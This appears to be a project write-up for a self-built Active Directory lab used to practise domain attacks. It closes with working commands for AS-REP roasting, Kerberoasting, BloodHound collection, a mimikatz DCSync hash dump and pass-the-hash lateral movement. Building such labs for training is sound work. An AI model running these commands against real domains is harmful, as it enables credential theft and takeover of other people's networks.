A simulated enterprise Active Directory environment built from scratch to practice privilege escalation, lateral movement, Kerberoasting, and AD enumeration with real pentesting tools.
This project involves building a fully functional Active Directory lab environment from scratch using virtualization. The goal is to simulate a real enterprise network with domain controllers, workstations, and users — then attack it using real pentesting tools and methodologies.
The lab replicates common misconfigurations found in real corporate environments including weak passwords, over-privileged service accounts, unconstrained delegation, and AS-REP roasting vulnerabilities.
# AS-REP Roasting — Get hashes for offline cracking
python3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt
# Kerberoasting — Request TGS tickets
python3 GetUserSPNs.py corp.local/user:password -outputfile kerberoast.txt
# BloodHound Collection
./SharpHound.exe -c All --zipfilename bloodhound_data.zip
# DCSync — Dump all hashes (requires DA)
mimikatz # lsadump::dcsync /domain:corp.local /all /csv
# Pass-the-Hash lateral movement
python3 psexec.py -hashes :NTLM_HASH corp.local/Administrator@192.168.1.10